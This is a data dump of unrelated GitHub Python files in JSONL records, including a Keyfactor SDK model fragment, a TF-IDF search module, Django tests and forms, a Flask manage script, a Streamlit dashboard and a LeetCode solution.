KeyfactorApiModelsWorkflowsParameterDefinitionResponseParameterType] = UNSET\n required: Union[Unset, bool] = UNSET\n default_value: Union[Unset, str] = UNSET\n control_type: Union[Unset, KeyfactorApiModelsWorkflowsParameterDefinitionResponseControlType] = UNSET\n potential_values: Union[Unset, KeyfactorApiModelsWorkflowsParameterDefinitionResponsePotentialValues] = UNSET\n support_token_replacement: Union[Unset, bool] = UNSET\n depends_on: Union[Unset, KeyfactorApiModelsWorkflowsParameterDefinitionResponseDependsOn] = UNSET\n additional_properties: Dict[str, Any] = attr.ib(init=False, factory=dict)\n\n def to_dict(self) -> Dict[str, Any]:\n display_name = self.display_name\n parameter_type: Union[Unset, int] = UNSET\n if not isinstance(self.parameter_type, Unset):\n parameter_type = self.parameter_type.value\n\n required = self.required\n default_value = self.default_value\n control_type: Union[Unset, int] = UNSET\n if not isinstance(self.control_type, Unset):\n control_type = self.control_type.value\n\n potential_values: Union[Unset, Dict[str, Any]] = UNSET\n if not isinstance(self.potential_values, Unset):\n potential_values = self.potential_values.to_dict()\n\n support_token_replacement = self.support_token_replacement\n depends_on: Union[Unset, Dict[str, Any]] = UNSET\n if not isinstance(self.depends_on, Unset):\n depends_on = self.depends_on.to_dict()\n\n field_dict: Dict[str, Any] = {}\n field_dict.update(self.additional_properties)\n field_dict.update({})\n if display_name is not UNSET:\n field_dict[\"DisplayName\"] = display_name\n if parameter_type is not UNSET:\n 
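# parameter_type already holds the enum's integer .value from above\n 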
field_dict[\"ParameterType\"] = parameter_type\n if required is not UNSET:\n field_dict[\"Required\"] = required\n if default_value is not UNSET:\n field_dict[\"DefaultValue\"] = default_value\n if control_type is not UNSET:\n field_dict[\"ControlType\"] = control_type\n if potential_values is not UNSET:\n field_dict[\"PotentialValues\"] = potential_values\n if support_token_replacement is not UNSET:\n field_dict[\"SupportTokenReplacement\"] = support_token_replacement\n if depends_on is not UNSET:\n field_dict[\"DependsOn\"] = depends_on\n\n return field_dict\n\n @classmethod\n def from_dict(cls: Type[T], src_dict: Dict[str, Any]) -> T:\n d = src_dict.copy()\n display_name = d.pop(\"DisplayName\", UNSET)\n\n _parameter_type = d.pop(\"ParameterType\", UNSET)\n parameter_type: Union[Unset, KeyfactorApiModelsWorkflowsParameterDefinitionResponseParameterType]\n if isinstance(_parameter_type, Unset):\n parameter_type = UNSET\n else:\n parameter_type = KeyfactorApiModelsWorkflowsParameterDefinitionResponseParameterType(_parameter_type)\n\n required = d.pop(\"Required\", UNSET)\n\n default_value = d.pop(\"DefaultValue\", UNSET)\n\n _control_type = d.pop(\"ControlType\", UNSET)\n control_type: Union[Unset, KeyfactorApiModelsWorkflowsParameterDefinitionResponseControlType]\n if isinstance(_control_type, Unset):\n control_type = UNSET\n else:\n control_type = KeyfactorApiModelsWorkflowsParameterDefinitionResponseControlType(_control_type)\n\n _potential_values = d.pop(\"PotentialValues\", UNSET)\n potential_values: Union[Unset, KeyfactorApiModelsWorkflowsParameterDefinitionResponsePotentialValues]\n if isinstance(_potential_values, Unset):\n potential_values = UNSET\n else:\n potential_values = KeyfactorApiModelsWorkflowsParameterDefinitionResponsePotentialValues.from_dict(\n _potential_values\n )\n\n support_token_replacement = d.pop(\"SupportTokenReplacement\", UNSET)\n\n _depends_on = d.pop(\"DependsOn\", UNSET)\n depends_on: Union[Unset, KeyfactorApiModelsWorkflowsParameterDefinitionResponseDependsOn]\n if isinstance(_depends_on, Unset):\n depends_on = UNSET\n else:\n depends_on = KeyfactorApiModelsWorkflowsParameterDefinitionResponseDependsOn.from_dict(_depends_on)\n\n keyfactor_api_models_workflows_parameter_definition_response = cls(\n display_name=display_name,\n parameter_type=parameter_type,\n required=required,\n default_value=default_value,\n control_type=control_type,\n potential_values=potential_values,\n support_token_replacement=support_token_replacement,\n depends_on=depends_on,\n )\n\n keyfactor_api_models_workflows_parameter_definition_response.additional_properties = d\n return keyfactor_api_models_workflows_parameter_definition_response\n\n @property\n def additional_keys(self) -> List[str]:\n return list(self.additional_properties.keys())\n\n def __getitem__(self, key: str) -> Any:\n return self.additional_properties[key]\n\n def __setitem__(self, key: str, value: Any) -> None:\n self.additional_properties[key] = value\n\n def __delitem__(self, key: str) -> None:\n del self.additional_properties[key]\n\n def __contains__(self, key: str) -> bool:\n return key in self.additional_properties\n","repo_name":"Keyfactor/keyfactor-python-client-sdk","sub_path":"kfclient/keyfactor_v_1_client/models/keyfactor_api_models_workflows_parameter_definition_response.py","file_name":"keyfactor_api_models_workflows_parameter_definition_response.py","file_ext":"py","file_size_in_byte":7045,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"27"} 
+{"seq_id":"70870847113","text":"#WAP to convert given value into binary\nlist1=[]\na=int(input(\"Enter a number:\"))\nz=a\nwhile a>0:\n x=a%2\n a//=2\n list1.append(x)\nlist1.reverse()\nprint(\"Binary for given no:\",z,\" is:\",list1)","repo_name":"ChinmayNaik27/Python_Programs","sub_path":"list/conversion.py","file_name":"conversion.py","file_ext":"py","file_size_in_byte":196,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"3021443688","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jun 29 17:34:55 2017\n\n@author: Rodrigo Azevedo\n\nModulo de buscador\n\"\"\"\n\nimport time\nimport logging\nimport configparser\nimport xml.etree.ElementTree as ET\nimport re\nimport csv\nimport ast\nimport math\nfrom unidecode import unidecode\nimport nltk\nfrom sklearn.metrics.pairwise import cosine_similarity\nfrom nltk.stem.porter import PorterStemmer\n\n# função para calcular cosine similarity\ndef cos_sim(A, B):\n num = 0\n A_den = 0\n B_den = 0\n for word_id, value in A.items():\n if word_id in B:\n num = num + value * B[word_id]\n A_den = A_den + value**2\n for word_id, value in B.items():\n B_den = B_den + value**2\n return (1.0*num)/(math.sqrt(A_den)*math.sqrt(B_den))\n\ndef run(EnablePorterStemmer = False):\n logging.info('Modulo de busca iniciado')\n \n config = configparser.ConfigParser()\n config.read('busca.cfg')\n file_model = config.get('config', 'MODELO')\n file_query = config.get('config', 'CONSULTAS')\n file_result = config.get('config', 'RESULTADOS')\n logging.info('Leitura do arquivo de configuração')\n \n csv.field_size_limit(500 * 1024 * 1024) # problema com 'field larger than field limit (131072)'\n with open(file_model, 'r') as csvfile:\n logging.info('Leitura do arquivo de modelo de indexação '+str(file_model))\n reader = csv.reader(csvfile, delimiter=';')\n for row in reader:\n if len(row):\n if row[0] == 'TOKENS':\n words_dict = ast.literal_eval(row[1])\n elif row[0] == 'MODEL':\n dict_doc_word = ast.literal_eval(row[1])\n elif row[0] == 'REVERSE':\n new_dict = ast.literal_eval(row[1])\n \n total_words = len(words_dict)\n total_documents = 0\n \n for document_id in dict_doc_word:\n total_documents = int(max(total_documents, document_id))\n \n # matrix esparca doc word\n #dict_doc_word = {}\n #for word_id in range(len(matrix_word_doc)):\n # for document_id, f in matrix_word_doc[word_id].items():\n # if document_id not in dict_doc_word:\n # dict_doc_word[document_id] = {}\n # dict_doc_word[document_id][word_id] = f\n #total_documents = int(max(total_documents, document_id))\n \n # matrix esparca doc word\n #for i in range(len(matrix_word_doc)):\n # for key, value in matrix_word_doc[i].items():\n # matrix_doc_word[key][i] = value\n \n # obter word pelo key\n #words_key = ['' for x in range(total_words)]\n #for key, value in words_dict.items():\n # words_key[value] = key\n \n # transpoe a matrix em documentos x termos\n #t_matrix = [list(i) for i in zip(*matrix)]\n \n tf_dict = {}\n for key, value in new_dict.items():\n tf_dict[key] = len(dict([(i, value.count(i)) for i in set(value)]))\n \n xml = ET.parse(file_query)\n logging.info('Leitura do arquivo de consultas '+str(file_query))\n root = xml.getroot()\n \n total_time = 0\n total_query = 0\n to_save = []\n for el in root.findall('QUERY'):\n start_time = time.time()\n total_query = total_query + 1\n num = int(el.find('QueryNumber').text)\n text = str(el.find('QueryText').text).upper()\n abstract = unidecode(text)\n tokenized = nltk.word_tokenize(abstract)\n if 
EnablePorterStemmer == True:\n stemmer = PorterStemmer()\n stemmed = [stemmer.stem(token) for token in tokenized]\n abstract = (' '.join(stemmed)).upper()\n tokenized = nltk.word_tokenize(abstract)\n tokens = {}\n # obtem tokens da query\n for token in tokenized:\n word = re.sub('[^A-Z]', '', token)\n if len(word) > 1:\n tokens[word] = 1\n # cria o vetor da query\n #query_vec = [0 for x in range(total_words)]\n query_vec = {}\n # atribui pesos no vetor\n for key in tokens:\n # palavras na consulta podem nao ter sido indexadas\n if key in words_dict:\n nd = total_documents\n df = tf_dict[key]*1.0\n idf = math.log((1.0+nd)/(1.0+df)) + 1 # calculo do idf\n tf = tokens[key]\n query_vec[words_dict[key]] = tf * idf\n # l2 normalization\n s = 0\n for key, value in query_vec.items():\n s = s + value**2\n s = math.sqrt(s)\n for key, value in query_vec.items():\n query_vec[key] = value / (s * 1.0)\n results = []\n for doc_id, value in dict_doc_word.items():\n doc = doc_id\n # cria o vetor do documento\n #doc_vec = [0 for x in range(total_words)]\n #for word_key, word_f in dict_doc_word[doc].items():\n # doc_vec[word_key] = word_f\n doc_vec = dict_doc_word[doc]\n #sim = cosine_similarity([query_vec], [doc_vec])\n sim = cos_sim(query_vec, doc_vec)\n #print(key + ' ' + str(sim)) #if sim > 0.7071:\n #results.append([doc_id, sim[0][0]])\n results.append([doc_id, sim])\n results.sort(key=lambda x: x[1], reverse=True)\n #results = results[:100]\n to_res = []\n for i in range(len(results)):\n res = [(i+1)]\n res.extend(results[i])\n to_res.append(res)\n to_save.append([num, to_res])\n total_time = total_time + time.time() - start_time\n \n logging.info('Finalizado processo de busca')\n logging.info('Tempo total de processamento: '+str(total_time)+' segundos')\n logging.info('Processamento médio por consulta: '+str(total_time/total_query)+' segundos')\n \n logging.info('Salvando arquivo de resultado de busca')\n # salvando dict de tokens, dict de documents e matriz em arquivo\n with open(file_result, 'w') as csv_file:\n writer = csv.writer(csv_file, delimiter=';')\n writer.writerows(to_save)\n logging.info('Arquivo de busca salvo')","repo_name":"rodrigoazs/bri_1","sub_path":"busca.py","file_name":"busca.py","file_ext":"py","file_size_in_byte":6042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"26739299933","text":"\"\"\"\nTests declaration for Nine CMS\n\nAll tests assume settings.LANGUAGE_CODE is defined\n\"\"\"\n__author__ = 'George Karakostas'\n__copyright__ = 'Copyright 2015, George Karakostas'\n__licence__ = 'BSD-3'\n__email__ = 'gkarak@9-dev.com'\n\nfrom django.test import TestCase\nfrom django.core.urlresolvers import reverse\nfrom django.utils import translation\nfrom django.conf import settings\nfrom django.core.management import call_command\nfrom django.core import mail\nfrom ninecms.models import Node\nfrom ninecms.tests.setup import assert_no_front, create_front, assert_front, create_basic, assert_basic, url_with_lang\nfrom ninecms.management.commands.check_updates import Capturing\nfrom ninecms.checks import check_settings\nfrom io import StringIO\n# noinspection PyPackageRequirements\nimport pip\n\n\nclass NoContentTests(TestCase):\n \"\"\" Tests with no initial content and no login \"\"\"\n \"\"\" Node System \"\"\"\n def test_node_view_with_no_content(self):\n \"\"\" Test node view if no content exists\n Explicitly remove url aliases if any remain, which has the same effect (see below)\n :return: None\n \"\"\"\n 
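# removing every node leaves nothing to serve at the front page\n 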
Node.objects.all().delete()\n assert_no_front(self)\n\n def test_node_view_with_no_front(self):\n \"\"\" Test node view with no / alias\n :return: None\n \"\"\"\n Node.objects.all().delete()\n create_front('/wrong-slug')\n assert_no_front(self)\n\n def test_node_view_with_front_title_not_repeating(self):\n \"\"\" Test that a front page does not repeat the title if it is the site title\n :return: None\n \"\"\"\n title = settings.SITE_NAME\n create_front('/', '', title)\n response = assert_front(self, reverse('ninecms:index'), '', title)\n self.assertContains(response, '' + title + '', html=True)\n self.assertNotContains(response, '' + title + ' | ' + title + '', html=True)\n\n def test_node_view_with_basic_two_level(self):\n \"\"\" Test basic node, two levels in alias\n Test node view of basic page, slash is missing (expecting redirect)\n Test properly, slash is not missing\n :return: None\n \"\"\"\n create_basic('about/company')\n response = assert_basic(self, 'about/company')\n self.assertRedirects(response, url_with_lang('/about/company/'), status_code=301)\n assert_basic(self, 'about/company/')\n\n def test_node_view_with_basic_wrong_alias(self):\n \"\"\" Test that a basic page with trailing / in alias is not found\n :return: None\n \"\"\"\n create_basic('about/')\n response = self.client.get(reverse('ninecms:alias', args=('about/',)))\n self.assertEqual(response.status_code, 404)\n\n def test_content_node_view_with_no_content(self):\n \"\"\" Test view with no content\n :return: None\n \"\"\"\n Node.objects.all().delete()\n translation.activate(settings.LANGUAGE_CODE)\n response = self.client.get(reverse('ninecms:content_node', args=(1,)))\n self.assertEqual(response.status_code, 404)\n\n def test_content_node_view_with_no_alias(self):\n \"\"\" Test view with a node with no path alias\n :return: None\n \"\"\"\n node_revision = create_basic('')\n assert_basic(self, node_revision.node_id, 'content_node')\n\n def test_command_check_updates(self):\n \"\"\" Test command check updates\n :return: None\n \"\"\"\n call_command('check_updates')\n with Capturing() as updates:\n pip.main(['list', '--outdated', '--retries', '1'])\n # noinspection PyUnresolvedReferences\n n = len(mail.outbox)\n if not updates:\n self.assertEqual(n, 0) # pragma: nocover\n else:\n self.assertEqual(n, 1) # pragma: nocover\n\n def test_command_cache_clear(self):\n \"\"\" Test command clear cache\n :return: None\n \"\"\"\n out = StringIO()\n call_command('cache_clear', stdout=out)\n self.assertEqual(out.getvalue(), 'Cache cleared.\\n')\n\n def test_checks(self):\n \"\"\" Test custom system checks\n :return: None\n \"\"\"\n self.assertFalse(check_settings(None))\n\n with self.settings(\n MEDIA_ROOT=None,\n MEDIA_URL=None,\n ADMINS=None,\n MANAGERS=None,\n SESSION_COOKIE_NAME='sessionid',\n CACHES={\n 'default': {\n 'BACKEND': 'django.core.cache.backends.memcached.MemcachedCache',\n 'KEY_PREFIX': None,\n }\n }):\n self.assertEqual(len(check_settings(None)), 6)\n","repo_name":"Wtower/django-ninecms","sub_path":"ninecms/tests/tests_no_content.py","file_name":"tests_no_content.py","file_ext":"py","file_size_in_byte":4679,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"27"} +{"seq_id":"40094975083","text":"import os\nimport traceback\nimport glob\nimport json\nimport re\nfrom bs4 import BeautifulSoup\n\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer, TfidfVectorizer\n\nfrom utils.code_extractor import *\nfrom Thread import Thread\nfrom Metrics import 
eval_mentions\n\nimport sys\nsys.path.append(os.path.abspath('/app/data/'))\n\ndata_labeling_dir = \"/app/data/so_threads/\"\ntags_dir = \"/app/data/tags.json\"\ntitle_dir = \"/app/data/title.json\"\napi_method_candidates_dir = \"/app/data/api_method_candidates.json\"\n\nwith open(tags_dir, \"r\") as fp:\n tags_dict = json.load(fp)\nwith open(title_dir, \"r\") as fp:\n title_dict = json.load(fp)\nwith open(api_method_candidates_dir, \"r\") as fp:\n api_cands = json.load(fp)\n \n\ndef read_txt(filename):\n with open(filename, \"r\") as fp: \n content = fp.read()\n return content\n\ndef tokenize(text):\n count_vec = CountVectorizer(lowercase=False)\n content_vocabs = count_vec.fit([text]).vocabulary_\n tokens= (list(content_vocabs.keys()))\n return tokens, content_vocabs\n\ndef get_text_scope(mentions, thread):\n text_scope = thread.get_text_wo_label()\n \n text_scope_lines = text_scope.split(\"\\n\")\n for mention in mentions:\n line = text_scope_lines[mention['line_i']]\n line = line.replace(mention['name'], \" \", 1)\n text_scope_lines[mention['line_i']] = line\n return \"\\n\".join(text_scope_lines)\n\ndef type_scoping(mention, thread, text_scope):\n fn_name = mention['name'].split(\".\")[-1]\n fn_name_caller = \".\".join(mention['name'].split(\".\")[:-1])\n tags = thread.tags\n text_scope = thread.get_title() + \" \" +thread.get_text_wo_label() + \" \".join(tags)\n text_scope_tokens, _= tokenize(text_scope)\n candidates = deepcopy(api_cands[fn_name])\n filtered_cands = []\n for fqn, lib in candidates.items():\n for tag in tags:\n if tag in lib:\n filtered_cands.append(fqn)\n break\n candidates = filtered_cands\n score_dict = {} \n has_type_one = {}\n for can_i, can in enumerate(candidates): \n score_dict[can] = 0\n has_type_one[can] = False\n for pos_type in mention['p_types']:\n can_parts = can.split(\".\")\n can_class =can_parts[-2]\n if pos_type in can:\n if len(pos_type.split(\".\")) > 1:\n if pos_type.split(\".\")[-1] != fn_name:\n focus_str = pos_type.split(\".\")[-2]\n else:\n focus_str = pos_type.split(\".\")[-1]\n \n else:\n focus_str = pos_type.split(\".\")[-1]\n\n if focus_str == can_class:\n score_dict[can] += 1\n\n for can in candidates:\n class_name = can.split(\".\")[-2]\n if fn_name_caller != \"\":\n if fn_name_caller == class_name:\n score_dict[can] += 1\n\n if class_name in text_scope_tokens:\n score_dict[can] += 1\n\n score_list = [(api, score) for api, score in score_dict.items()]\n score_list = sorted(score_list, key=lambda api: api[1], reverse=True)\n\n if len(score_list) == 0 or score_list[0][1] == 0:\n prediction = \"None\"\n score = 0\n else:\n prediction = score_list[0][0]\n score = score_list[0][1]\n \n return prediction, score\n\n\n\n\ndef run_experiment():\n files = glob.glob(data_labeling_dir+\"/*\")\n file_dict = []\n \n # Start\n list_all_predicted_mentions = []\n for file_temp in files:\n thread_id = file_temp.split(os.sep)[-1].split(\".\")[0]\n a_thread = Thread(read_txt(file_temp), title_dict[thread_id], tags_dict[thread_id])\n \n possible_type_list = a_thread.get_possible_type_dict()\n \n p_type_dict = a_thread.extract_possible_types()\n text_mentions = a_thread.get_api_mention_text()\n \n new_text_mentions = []\n for m_idx, m in enumerate(text_mentions):\n mention = deepcopy(m)\n mention['p_types'] = []\n list_p_types = []\n simple_m_name = m['name'].split(\".\")[-1]\n prefix = \".\".join(m['name'].split(\".\")[:-1])\n if prefix != \"\":\n if prefix in p_type_dict:\n p_types_of_prefix = p_type_dict[prefix]\n for p_type in p_types_of_prefix:\n 
list_p_types.append(p_type)\n \n elif m['name'] in p_type_dict:\n method_related_p_types = p_type_dict[m['name']]\n for p_type in method_related_p_types:\n list_p_types.append(p_type)\n if p_type in p_type_dict:\n list_p_types += p_type_dict[p_type]\n mention['p_types'] = list(set(list_p_types))\n mention['thread'] = a_thread.thread_id\n new_text_mentions.append(mention)\n\n\n text_scope = get_text_scope(new_text_mentions, a_thread)\n for mention in new_text_mentions:\n mention['pred'], mention['score'] = type_scoping(mention, a_thread, text_scope)\n\n list_all_predicted_mentions += new_text_mentions\n\n eval_mentions(list_all_predicted_mentions)\n\nif __name__ == \"__main__\":\n print(\"Start running DATYS ...\")\n run_experiment()","repo_name":"Kienlgk/DATYS","sub_path":"src/run_experiment.py","file_name":"run_experiment.py","file_ext":"py","file_size_in_byte":5286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"30243775527","text":"import pyodbc\nimport re\nfrom Classes.GPA import GPA\nfrom Classes.Majors import Majors\nfrom Classes.UACollege import UACollege\n\n\nclass MapDBtoSPR(object):\n def __init__(self, SQLQuery):\n self.SQLQuery = SQLQuery\n self.eligibilities = []\n self.scholarshipIds = []\n\n\n def connectToTheDatabase(self):\n global cnxn, cursor\n cnxn = pyodbc.connect(r'Driver={SQL Server};Server=SUDB-DEV;Database=Spiderman;Trusted_Connection=yes;')\n cursor = cnxn.cursor()\n\n def getInfoFromDatabase(self):\n cursor.execute(self.SQLQuery)\n\n def populateEligibilitiesandScholarshipIds(self):\n self.connectToTheDatabase()\n self.getInfoFromDatabase()\n\n while 1:\n row = cursor.fetchone()\n if not row:\n break\n self.eligibilities.append(row.Elgibility)\n self.scholarshipIds.append(row.ScholarshipPackageId)\n\n return None\n\n def doGPAParser(self, eligibility, scholarshipId):\n parseGPA = GPA(eligibility, scholarshipId)\n if parseGPA.getGPA() != '':\n # print(parseGPA.getGPA())\n # print(parseGPA.getScholarshipPackageRequirementFormat().getStringValue())\n return parseGPA.getScholarshipPackageRequirementFormat()\n\n def doMajorsParser(self, eligibility, scholarshipId):\n parseMajors = Majors(eligibility, scholarshipId, Majors.majorsRegexForTesting())\n if parseMajors.getMajors() != '':\n # print(parseMajors.getMajors())\n # print(parseMajors.getScholarshipPackageRequirementFormat().getStringValue())\n return parseMajors.getScholarshipPackageRequirementFormat()\n\n def doUACollege(self, eligibility, scholarshipId):\n parseUACollege = UACollege(eligibility, scholarshipId, UACollege.uaCollegesListForTesting())\n if parseUACollege.getUACollege() != '':\n # print(parseUACollege.getUACollege())\n # print(parseUACollege.getScholarshipPackageRequirementFormat().getStringValue())\n return parseUACollege.getScholarshipPackageRequirementFormat()\n\n def loopOverEligibilities(self):\n self.populateEligibilitiesandScholarshipIds()\n for i in range(len(self.eligibilities)):\n scholarshipId = self.scholarshipIds[i]\n\n eligibility = self.eligibilities[i]\n eligibility = re.sub('<.*?>| ', '', eligibility)\n\n print('\\n\\n')\n print(scholarshipId)\n print(eligibility)\n\n splitEligibility = eligibility.split('\\n')\n for eligibility in splitEligibility:\n self.doGPAParser(eligibility, scholarshipId)\n self.doMajorsParser(eligibility, scholarshipId)\n self.doUACollege(eligibility, scholarshipId)\n\n'''\ntest = MapDBtoSPR(\n \"SELECT ScholarshipPackageId, Elgibility FROM dbo.DepartmentTestCases WHERE AttributeId =5 OR 
AttributeId =417 OR AttributeId=377\")\ntest.loopOverEligibilities()\n'''\n","repo_name":"kyajpauley/cerebro","sub_path":"Classes/MapDBtoSPR.py","file_name":"MapDBtoSPR.py","file_ext":"py","file_size_in_byte":2980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"2033915100","text":"\"\"\"\nDescrição do arquivo: este é o arquivo principal da API, aqui será feito o gerenciamento do banco de dados\n(com os comandos drop_db e create_db, por exemplo) e a execução da API (com o comando run)\nImports deste arquivo:\n Manager: permite criar comandos para usar na linha de comando com o decorator @manager.command\n create_app: cria o app já com o db setado (ver em app/main/__init__.py)\n db: objeto SQAlchemy para o gerenciamento do banco de dados através do Flask\n blueprint: objeto que registra informações a respeito das funções da API (útil para a modularização)\n\"\"\"\n\nfrom flask_script import Manager\nfrom app.main import create_app, db\nfrom app import blueprint\n\napp = create_app()\napp.register_blueprint(blueprint)\n\n# liga o contexto do 'app' ao contexto atual do script\napp.app_context().push()\n\nmanager = Manager(app)\n\n@manager.command\ndef run():\n \"\"\"Run the API\"\"\"\n app.run(debug=True, host='0.0.0.0', port=5000)\n\n@manager.command\ndef drop_db():\n \"\"\"Drop the database removing all its contents\"\"\"\n db.drop_all()\n\n@manager.command\ndef create_db():\n \"\"\"Create the database\"\"\"\n db.create_all()\n\nif __name__ == '__main__':\n manager.run()","repo_name":"matthews34/stop_down","sub_path":"api/manage.py","file_name":"manage.py","file_ext":"py","file_size_in_byte":1197,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"72323115592","text":"#colors\nbg = \"#ffffff\" #background\nedge = \"#000\" #grid lines\ntxt = \"#000000\" #text\nfill = \"#4fafff\" #filled boxes\nempty = \"#eeeeff\" #unmarked boxes\nchecked = \"#bbbbbb\" #crossed out boxes\nactive = \"#dddddd\" #hover\n\n#other variables\nmax_grid_count = 100 #maximum width or height of a new grid\noffset = 20 #padding used in windows","repo_name":"thebiene/cs152_project_2023","sub_path":"picross/variables.py","file_name":"variables.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"9570972195","text":"#import the required libraries \r\n\r\nimport streamlit as st\r\nimport pandas as pd\r\nimport numpy as np \r\nimport plotly.express as px \r\nimport json\r\nfrom streamlit_lottie import st_lottie\r\n\r\n\r\nst.set_page_config(\r\n page_title=\"اســتـبـيـان المجتمع العربي\",\r\n page_icon= \"🇺🇳\",\r\n layout='wide'\r\n)\r\n\r\nst.write('', unsafe_allow_html=True)\r\n\r\n\r\n#defining lottie function to visualize animated pictures\r\ndef load_lottiefile(filepath: str):\r\n with open(filepath) as f:\r\n return json.load(f)\r\n\r\n\r\nleft_co, cent_co,last_co = st.columns(3)\r\nwith last_co:\r\n st.image(\"https://i2.wp.com/ummah-futures.net/wp-content/uploads/2019/12/%D8%A7%D9%84%D9%84%D8%AC%D9%86%D8%A9-%D8%A7%D9%84%D8%A7%D9%82%D8%AA%D8%B5%D8%A7%D8%AF%D9%8A%D8%A9-%D9%88%D8%A7%D9%84%D8%A7%D8%AC%D8%AA%D9%85%D8%A7%D8%B9%D9%8A%D8%A9-%D9%84%D8%BA%D8%B1%D8%A8%D9%8A-%D8%A2%D8%B3%D9%8A%D8%A7-1.jpg?w=500&ssl=1\")\r\nwith left_co:\r\n st.image(\"https://www.unescwa.org/sites/default/files/images/flags/Flag_of_Bahrain.svg\")\r\nst.image(\"title.PNG\")\r\n\r\n\r\nleftt_co, centt_co,lastt_co = 
st.columns([1,1,2])\r\nwith lastt_co :\r\n st.title('البحرين')\r\n st.image(\"SUB HEADER.PNG\")\r\n \r\ncol1, col2, col3, col4, col5, col6, col7 = st.columns(7)\r\nwith col1:\r\n st.write(\"[Population - السكان]()\")\r\n\r\nwith col2:\r\n st.write(\"[Labor - العمالة](https://docs.google.com/spreadsheets/d/1UGEiAmFwx7iiY1WV1s7l0TFz08pQPGju/edit?usp=sharing&ouid=100083186149459779256&rtpof=true&sd=true)\")\r\nwith col3:\r\n st.write(\"[Poverty - الفقر]()\")\r\nwith col4:\r\n st.write(\"[Education - التعليم]()\")\r\nwith col5:\r\n st.write(\"[Culture - الثقافة]()\")\r\nwith col6:\r\n st.write(\"[Health - الصحة]()\")\r\nwith col7:\r\n st.write(\"[Housing Conditions - المساكن]()\") \r\n \r\n\r\n#edit footer\r\npage_style= \"\"\"\r\n \"\"\"\r\n\r\nst.markdown(page_style, unsafe_allow_html=True)\r\n","repo_name":"alymaatouk/Bahrain","sub_path":"streamlit_students_dashboard.py","file_name":"streamlit_students_dashboard.py","file_ext":"py","file_size_in_byte":2230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"42656277410","text":"from django import forms\n\nfrom django_summernote.widgets import SummernoteWidget\n\nfrom submission import models\nfrom core import models as core_models\nfrom plugins.commission import models as comm_models\nfrom utils.forms import HTMLDateInput\n\n\nclass CommissionArticle(forms.ModelForm):\n def __init__(self, *args, **kwargs):\n self.journal = kwargs.pop('journal')\n super(CommissionArticle, self).__init__(*args, **kwargs)\n self.fields[\n 'section'].queryset = models.Section.objects.filter(\n journal=self.journal,\n public_submissions=True,\n )\n\n def save(self, commit=True):\n article = super(CommissionArticle, self).save(commit=False)\n article.journal = self.journal\n\n if commit:\n article.save()\n\n return article\n\n class Meta:\n model = models.Article\n fields = (\n 'title',\n 'section',\n )\n\n help_texts = {\n 'owner': 'The owner must be an existing user. 
You can add a new '\n 'user from the manager area.',\n }\n\n\nclass DeadlineForm(forms.ModelForm):\n class Meta:\n model = comm_models.CommissionedArticle\n fields = ('deadline', 'submission_deadline', 'additional_information')\n widgets = {\n 'deadline': HTMLDateInput,\n 'submission_deadline': HTMLDateInput,\n }\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.fields['deadline'].required = True\n\n\nclass ExistingAuthor(forms.Form):\n author = forms.ModelChoiceField(\n queryset=core_models.Account.objects.all()\n )\n\n\nclass CommissionTemplateForm(forms.ModelForm):\n class Meta:\n model = comm_models.CommissionTemplate\n fields = (\n 'name',\n 'section',\n 'template',\n 'sent_on_acceptance',\n )\n widgets = {\n 'template': SummernoteWidget(),\n }\n\n def __init__(self, *args, **kwargs):\n self.journal = kwargs.pop('journal')\n super(CommissionTemplateForm, self).__init__(*args, **kwargs)\n self.fields[\n 'section'].queryset = models.Section.objects.filter(\n journal=self.journal,\n )\n","repo_name":"BirkbeckCTP/commission","sub_path":"forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"36088198750","text":"#\n# @lc app=leetcode.cn id=498 lang=python3\n#\n# [498] 对角线遍历\n#\n# https://leetcode-cn.com/problems/diagonal-traverse/description/\n#\n# algorithms\n# Medium (42.04%)\n# Likes: 124\n# Dislikes: 0\n# Total Accepted: 23.8K\n# Total Submissions: 56.5K\n# Testcase Example: '[[1,2,3],[4,5,6],[7,8,9]]'\n#\n# 给定一个含有 M x N 个元素的矩阵(M 行,N 列),请以对角线遍历的顺序返回这个矩阵中的所有元素,对角线遍历如下图所示。\n#\n#\n#\n# 示例:\n#\n# 输入:\n# [\n# ⁠[ 1, 2, 3 ],\n# ⁠[ 4, 5, 6 ],\n# ⁠[ 7, 8, 9 ]\n# ]\n#\n# 输出: [1,2,4,7,5,3,6,8,9]\n#\n# 解释:\n#\n#\n#\n#\n#\n# 说明:\n#\n#\n# 给定矩阵中的元素总数不会超过 100000 。\n#\n#\n#\nfrom typing import List\nimport collections\n# @lc code=start\nclass Solution:\n def findDiagonalOrder(self, matrix: List[List[int]]) -> List[int]:\n if not matrix: return []\n lookup = collections.defaultdict(list)\n \n row, col = len(matrix), len(matrix[0])\n\n for i in range(row):\n for j in range(col):\n lookup[j + i].append(matrix[i][j])\n \n res = []\n flag = True\n for k, v in sorted(lookup.items()):\n if flag:\n res.extend(v[::-1])\n else:\n res.extend(v)\n flag = not flag\n return res\n\n# @lc code=end\nif __name__ == \"__main__\":\n test = Solution()\n print(test.findDiagonalOrder([[1,2,3],[4,5,6],[7,8,9]]))","repo_name":"StrayCamel247/Leetcode","sub_path":"questions/498.对角线遍历.py","file_name":"498.对角线遍历.py","file_ext":"py","file_size_in_byte":1460,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"27"} 